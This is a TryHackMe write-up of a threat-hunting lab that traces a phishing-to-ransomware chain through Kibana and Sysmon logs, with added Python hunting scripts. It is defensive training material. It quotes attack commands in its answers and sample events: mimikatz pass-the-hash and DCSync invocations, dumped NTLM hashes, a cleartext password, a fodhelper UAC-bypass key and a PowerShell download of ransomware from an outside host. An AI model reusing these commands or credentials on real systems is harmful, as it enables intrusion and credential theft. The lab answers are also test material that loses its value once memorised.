Boogeyman 3 — TryHackMe Write-Up

· prosetesting's blog

Threat hunting in an ELK stack: tracing a full attack chain from ISO phishing to ransomware deployment via mimikatz, WinRM and DCSync.

Boogeyman 3 #

🏴 Platform: TryHackMe
🔬 Category: DFIR / Threat Hunting (ELK)
🟠 Difficulty: Medium
📅 Date: 2026-02-14
✍️ Author: t0nt0n
⏱️ Reading time: ~5 min

Context #

Quick Logistics LLC was targeted by the Boogeyman threat group in a sophisticated attack. The analysis relies on Sysmon and Windows logs ingested into an ELK stack (index winlogbeat-*). The goal: trace the full attack chain from initial phishing to ransomware deployment.

Reconnaissance #

Kibana index: winlogbeat-*
Time range: August 29-30, 2023
Machines involved: WKSTN-0051, WKSTN-1327, DC01.quicklogistics.org

Overview — Process Tree #

WKSTN-0051 (evan.hutchinson)
│
├─ iexplore.exe
│  └─ download: ProjectFinancialSummary_Q3.pdf.iso
│     └─ mount ISO → D:\
│
├─ mshta.exe [PID ????]                        ← Q1  HTA execution
│  │  cmd: D:\ProjectFinancialSummary_Q3.pdf.hta
│  │
│  ├─ xcopy.exe                                 ← Q2  Copy DLL to %TEMP%
│  │     D:\review.dat → %TEMP%\review.dat
│  │
│  ├─ rundll32.exe                              ← Q3  DLL sideload
│  │  │  review.dat,DllRegisterServer
│  │  │
│  │  └──── C2: ???.???.???.???:??              ← Q5  C2 callback
│  │
│  └─ powershell.exe                            ← Q4  Persistence
│        schtasks /create "??????"
│
├─ ????????????.exe                              ← Q6  UAC Bypass
│
├─ mimikatz.exe                                 ← Q7  Downloaded from GitHub
│  │  sekurlsa::logonpasswords
│  └─ ????????:????????????????                 ← Q8  Credential dump
│
├─ net use \\WKSTN-1327\ITFiles                 ← Q9  Discovery
│  └─ read: ??????????????.ps1
│     └─ creds: QUICKLOGISTICS\??????????       ← Q10 Cleartext creds
│
└─ Invoke-Command -ComputerName ??????????      ← Q11 Lateral movement

         ??????????
         │
         ├─ ??????????????.exe                   ← Q12 Parent process (WinRM)
         │
         ├─ mimikatz.exe
         │  │  sekurlsa::pth (Pass-the-Hash)
         │  └─ ?????????????:????????????????   ← Q13 Admin hash
         │
         └─ lsadump::dcsync                     ← Q14 DCSync
               account: ????????

                  DC01.quicklogistics.org
                  │
                  └─ powershell.exe
                     │  iwr http://??????????????
                     │      /??????????????.exe         ← Q15
                     │
                     └─ ransomware deployment
                        ├─ WKSTN-0051
                        ├─ WKSTN-1327
                        └─ DC01
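The tree above is what you get after joining process.pid to process.parent.pid across Sysmon Event ID 1 records and attaching the Event ID 3 connection of each process. The script below is an added example (editor's code, not part of the write-up or the room) that performs that join over a handful of constructed Winlogbeat-style events; it reuses only the values the post reveals (mshta PID 6392, the xcopy and rundll32 command lines, the C2 endpoint) and invents every other PID as well as the abbreviated powershell command line.

```python
"""Rebuild a parent/child process tree from Sysmon Event ID 1 records as
Winlogbeat ships them (ECS field names, flattened here to dotted keys), and
hang each process's Sysmon Event ID 3 network connections beneath it.

Added example, not code from the write-up.  EVENTS is constructed: it reuses
the values the post reveals (mshta PID 6392, the xcopy and rundll32 command
lines, the C2 endpoint) and invents every other PID and the abbreviated
powershell command line."""
from collections import defaultdict


def ev(host, code, pid, ppid, name, cmd, **extra):
    """One flattened Winlogbeat-style event (constructed sample data)."""
    e = {"host.name": host, "event.code": code, "process.pid": pid,
         "process.parent.pid": ppid, "process.name": name,
         "process.command_line": cmd}
    e.update(extra)
    return e


W = "WKSTN-0051"
EVENTS = [
    ev(W, "1", 4120, 1000, "explorer.exe", "C:\\Windows\\explorer.exe"),   # PIDs invented
    ev(W, "1", 6392, 4120, "mshta.exe",
       '"C:\\Windows\\System32\\mshta.exe" D:\\ProjectFinancialSummary_Q3.pdf.hta'),
    ev(W, "1", 7001, 6392, "xcopy.exe",                                     # PID invented
       '"C:\\Windows\\System32\\xcopy.exe" /s /i /e /h D:\\review.dat '
       'C:\\Users\\EVAN~1.HUT\\AppData\\Local\\Temp\\review.dat'),
    ev(W, "1", 7002, 6392, "rundll32.exe",                                  # PID invented
       '"C:\\Windows\\System32\\rundll32.exe" D:\\review.dat,DllRegisterServer'),
    ev(W, "1", 7003, 6392, "powershell.exe",                                # PID and cmd invented
       "powershell.exe schtasks /create /tn Review"),
    # Event ID 3 carries the pid of the connecting process, no parent pid
    ev(W, "3", 7002, None, "rundll32.exe", None,
       **{"destination.ip": "165.232.170.151", "destination.port": 80}),
]


def index_events(events):
    """Index process-creation events by (host, pid), children by (host, ppid),
    and network connections by the (host, pid) that made them."""
    procs, children, conns = {}, defaultdict(list), defaultdict(list)
    for e in events:
        key = (e["host.name"], e["process.pid"])
        if e["event.code"] == "1":
            procs[key] = e
            children[(e["host.name"], e["process.parent.pid"])].append(key)
        elif e["event.code"] == "3":
            conns[key].append((e["destination.ip"], e["destination.port"]))
    return procs, children, conns


def find_pids(events, name):
    """PIDs of every process-creation event for an image name (the Q1 lookup)."""
    return sorted(e["process.pid"] for e in events
                  if e["event.code"] == "1" and e["process.name"].lower() == name.lower())


def child_names(events, host, pid):
    """Image names of the direct children of (host, pid) (the Q2 lookup)."""
    procs, children, _ = index_events(events)
    return sorted(procs[k]["process.name"] for k in children.get((host, pid), []))


def ancestry(events, host, pid):
    """Image names from (host, pid) up to the topmost process we have a record for."""
    procs, _, _ = index_events(events)
    chain, key = [], (host, pid)
    while key in procs:
        chain.append(procs[key]["process.name"])
        key = (host, procs[key]["process.parent.pid"])
    return chain


def render_tree(events, host, root_pid):
    """Depth-first text rendering of the subtree under (host, root_pid), with
    the network connections a process made listed directly beneath it."""
    procs, children, conns = index_events(events)
    lines = []

    def walk(key, depth):
        p = procs[key]
        pad = "  " * depth
        lines.append(f"{pad}{p['process.name']} [PID {key[1]}]  {p['process.command_line']}")
        for ip, port in conns.get(key, []):
            lines.append(f"{pad}  -> network {ip}:{port}")
        for child in sorted(children.get(key, []), key=lambda k: k[1]):
            walk(child, depth + 1)

    walk((host, root_pid), 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS, W, find_pids(EVENTS, "mshta.exe")[0])))
```

Against real data, replace EVENTS with the hits of a process.parent.pid / process.pid query exported from Kibana; the join is per host, so PIDs reused on different machines never collide.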

Attack Chain #

1. Initial Access — ISO Phishing + HTA (Q1) #

The lure is an ISO image. Once the user mounts it, Windows assigns it a drive letter (D:\ here) and the attacker's file shows up as ProjectFinancialSummary_Q3.pdf.hta: with known extensions hidden it reads as a PDF, but it is an HTA that mshta.exe executes. Before Microsoft's late-2022 fix, ISO delivery also stripped the mark-of-the-web from the files inside.

process.command_line: *.hta*

Result: mshta.exe executes the .pdf.hta payload from the mounted ISO drive. The PID is the process.pid field of the matching Sysmon Event ID 1 (process creation) record.

Answer (Q1): 6392

2. Staging — DLL Payload Copy (Q2) #

process.parent.name: mshta.exe

Three child processes identified: xcopy.exe, rundll32.exe and powershell.exe.

The xcopy command reveals the full staging path: review.dat is copied from the ISO into the user's %TEMP% directory (the profile folder appears under its 8.3 short name EVAN~1.HUT, which is how the path will look in the log). The /h switch copies hidden and system files as well, so a hidden payload on the ISO still comes across. Check the complete command line.

Answer (Q2):

"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat

3. Execution — DLL Sideloading (Q3) #

The payload is executed by rundll32.exe, which loads review.dat and calls its DllRegisterServer export. Two details matter for the hunt: the module is loaded straight from the ISO (D:\review.dat), not from the %TEMP% copy staged a moment earlier, and the .dat extension is irrelevant because rundll32 loads any PE image that exports the requested function, so a filter on *.dll would miss it. Strictly this is rundll32 proxy execution (ATT&CK T1218.011) rather than DLL side-loading, which would involve a legitimate application picking up the malicious DLL through its search order.

Answer (Q3):

"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer

4. Persistence — Scheduled Task (Q4) #

A scheduled task is created via PowerShell. Filter on schtasks in the command line (process.command_line: *schtasks*) and read the /tn argument for the task name; the /tr argument of the same command shows what the task runs, which is what you need to scope the persistence.

Answer (Q4): Review

5. Command & Control (Q5) #

process.name: rundll32.exe AND event.category: network

This returns Sysmon Event ID 3 (network connection) records. The destination.ip and destination.port fields of the connection made by rundll32.exe give the C2 endpoint; port 80 suggests a plain-HTTP beacon, so the traffic itself would be readable if it was captured.

Answer (Q5): 165.232.170.151:80

6. Privilege Escalation — UAC Bypass (Q6) #

process.name: (fodhelper.exe OR eventvwr.exe OR computerdefaults.exe OR sdclt.exe)

One of these classic UAC bypass binaries was used. All four are auto-elevating Microsoft executables that can be coaxed into running an attacker-controlled command through a per-user registry key; for fodhelper.exe that key is HKCU\Software\Classes\ms-settings\Shell\Open\command, so a Sysmon Event ID 13 (registry value set) on that path shortly before the process start corroborates the finding and reveals the elevated command.

Answer (Q6): fodhelper.exe

7. Credential Access — Mimikatz (Q7, Q8) #

Search for the mimikatz download:

process.command_line: *github*

The full GitHub URL answers Q7. For Q8, keep in mind that Sysmon logs process creation, not console output, so the sekurlsa::logonpasswords result is not in the index as such; find the dumped credential where the attacker reuses it, for example a later command line that names the user together with a 32-hex-character NTLM hash, or PowerShell script block logs (Event ID 4104) if those are collected.

Answer (Q7): https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

Answer (Q8): itadmin:F84769D250EB95EB2D7D8B4A1C5613F2

8. Discovery — Network Share (Q9) #

host.name: WKSTN-0051* AND process.command_line: *\\\\*

In KQL the backslash is an escape character, so four of them match a literal \\ UNC prefix. The hits show the attacker mapping \\WKSTN-1327\ITFiles and reading a PowerShell script on that share; the script holds cleartext credentials.

Answer (Q9): IT_Automation.ps1

9. Lateral Movement — WinRM (Q10, Q11, Q12) #

The script stores credentials in DOMAIN\user:password form (Q10). Search process.command_line for Invoke-Command and read its -ComputerName argument to get the target (Q11). On the target, every command delivered over WinRM is spawned by the WinRM provider host, so filter host.name: WKSTN-1327* AND process.parent.name: wsmprovhost.exe to see what the attacker launched there; that parent is the answer to Q12.

Answer (Q10): QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987

Answer (Q11): WKSTN-1327

Answer (Q12): wsmprovhost.exe

10. Credential Access — Pass-the-Hash + DCSync (Q13, Q14) #

On the second machine mimikatz runs again, now with sekurlsa::pth and lsadump::dcsync. Both leave everything in process.command_line: the pth invocation carries /user: and /ntlm: arguments, which give the administrator hash (Q13), and the dcsync invocation carries the /user: of the account whose secrets are pulled from the domain controller (Q14). If DC01's Security log is in the index, the same DCSync also shows up as Event ID 4662 with the DS-Replication-Get-Changes rights requested by a non-DC account, which is the reliable server-side detection.

Answer (Q13): administrator:00f80f2538dcb54e7adc715c0e7091ec

Answer (Q14): backupda

11. Actions on Objectives — Ransomware (Q15) #

host.name: DC01* AND process.command_line: (*download* OR *iwr* OR *http*)

The ransomware is fetched on the domain controller with PowerShell (iwr is the alias of Invoke-WebRequest) over plain HTTP and then deployed across all three machines. The URL in the command line is the Q15 answer and the obvious indicator to block.

Answer (Q15): http://ff.sillytechninja.io/ransomboogey.exe
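Every query from step 3 onward is a filter followed by a manual read of the command line to pull out the answer. As an added example (editor's code, not from the write-up or the room), the script below encodes those hunts as rules over constructed Winlogbeat-style events and extracts the artifact from each hit with a regex. The hosts, binaries, task name, hashes, account names and URLs are the values the post reveals; the exact command-line shapes around them are invented and marked as such in the code.

```python
"""Rule-based hunt over flattened Winlogbeat/Sysmon events, mirroring the
KQL filters in the steps above and extracting the answer from each hit.

Added example, not code from the write-up.  EVENTS is constructed sample
data: hosts, binaries, task name, hashes, account names and URLs are the
values the post reveals; the command-line shapes around them are invented."""
import re

URL = re.compile(r"https?://[^\s\"']+", re.I)
UAC_BINS = {"fodhelper.exe", "eventvwr.exe", "computerdefaults.exe", "sdclt.exe"}
RULES = []  # (rule name, function(event) -> extracted detail or None)

def ev(host, name, cmd, parent="explorer.exe"):
    """One flattened event (constructed); parent defaults to explorer.exe."""
    return {"host.name": host, "process.name": name,
            "process.command_line": cmd, "process.parent.name": parent}

EVENTS = [
    ev("WKSTN-0051", "rundll32.exe",
       '"C:\\Windows\\System32\\rundll32.exe" D:\\review.dat,DllRegisterServer', parent="mshta.exe"),
    ev("WKSTN-0051", "powershell.exe", 'powershell.exe schtasks /create /tn "Review" /sc minute'),
    ev("WKSTN-0051", "fodhelper.exe", "C:\\Windows\\System32\\fodhelper.exe"),
    ev("WKSTN-0051", "powershell.exe", "powershell.exe iwr https://github.com/gentilkiwi/mimikatz/"
       "releases/download/2.2.0-20220919/mimikatz_trunk.zip -OutFile mimikatz_trunk.zip"),
    ev("WKSTN-0051", "net.exe", "net use \\\\WKSTN-1327\\ITFiles"),
    ev("WKSTN-0051", "powershell.exe",
       "powershell.exe Invoke-Command -ComputerName WKSTN-1327 -ScriptBlock { whoami }"),
    ev("WKSTN-1327", "mimikatz.exe", 'mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator '
       '/domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe"',
       parent="wsmprovhost.exe"),
    ev("WKSTN-1327", "mimikatz.exe", 'mimikatz.exe "lsadump::dcsync /domain:quicklogistics.org /user:backupda"',
       parent="wsmprovhost.exe"),
    ev("DC01", "powershell.exe", "powershell.exe iwr http://ff.sillytechninja.io/ransomboogey.exe -OutFile r.exe"),
]

def rule(name):
    """Register the decorated function as a hunting rule."""
    def register(fn):
        RULES.append((name, fn))
        return fn
    return register

def grab(pattern, e, group=1):
    """First capture group of pattern in the event's command line, else None."""
    m = re.search(pattern, e["process.command_line"], re.I)
    return m.group(group) if m else None

@rule("rundll32-non-dll")      # Q3: module handed to rundll32 is not a .dll
def rundll32_module(e):
    m = re.search(r'rundll32\.exe"?\s+([^\s,]+),(\w+)', e["process.command_line"], re.I)
    return f"{m.group(1)} -> {m.group(2)}" if m and not m.group(1).lower().endswith(".dll") else None

@rule("scheduled-task")        # Q4: /tn argument of schtasks /create
def schtask(e):
    return grab(r'schtasks\s+/create\b.*?/tn\s+"?([^"\s]+)', e)

@rule("uac-bypass-binary")     # Q6: auto-elevating binaries
def uac_binary(e):
    return e["process.name"].lower() if e["process.name"].lower() in UAC_BINS else None

@rule("github-download")       # Q7: tooling pulled from GitHub
def github(e):
    return next((u for u in URL.findall(e["process.command_line"]) if "github.com/" in u.lower()), None)

@rule("share-access")          # Q9: UNC path given to net use
def share(e):
    return grab(r'\bnet\s+use\b.*?(\\\\[^\s"]+)', e)

@rule("invoke-command")        # Q11: remote host named in Invoke-Command
def invoke_target(e):
    return grab(r'Invoke-Command\b.*?-ComputerName\s+([^\s"]+)', e)

@rule("winrm-child")           # Q12: spawned by the WinRM provider host
def winrm_child(e):
    return e["process.name"] if e["process.parent.name"].lower() == "wsmprovhost.exe" else None

@rule("pass-the-hash")         # Q13: user and NTLM hash from sekurlsa::pth
def pth(e):
    m = re.search(r'sekurlsa::pth\b.*?/user:([^\s"]+).*?/ntlm:([0-9a-f]{32})', e["process.command_line"], re.I)
    return f"{m.group(1)}:{m.group(2)}" if m else None

@rule("dcsync")                # Q14: account replicated by lsadump::dcsync
def dcsync(e):
    return grab(r'lsadump::dcsync\b.*?/user:([^\s"]+)', e)

@rule("dc-download")           # Q15: web download issued on a domain controller
def dc_download(e):
    cmd = e["process.command_line"]
    fetch = re.search(r"\b(iwr|Invoke-WebRequest|DownloadFile|DownloadString)\b", cmd, re.I)
    m = URL.search(cmd)
    return m.group(0) if fetch and m and e["host.name"].upper().startswith("DC") else None

def hunt(events):
    """Run every rule over every event; return (rule, host, detail) triples."""
    return [(name, e["host.name"], d) for e in events for name, fn in RULES if (d := fn(e))]

if __name__ == "__main__":
    for name, host, detail in hunt(EVENTS):
        print(f"{name:18} {host:11} {detail}")
```

The rules are deliberately permissive (case-insensitive, quote-tolerant) because the same commands arrive with different quoting depending on whether they were typed into cmd.exe, PowerShell or passed through Invoke-Command; tighten them against your own baseline before turning them into alerts.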

Tools Used #

Kibana on an ELK stack (index winlogbeat-*), Winlogbeat, Sysmon (process creation and network connection events), Windows event logs.
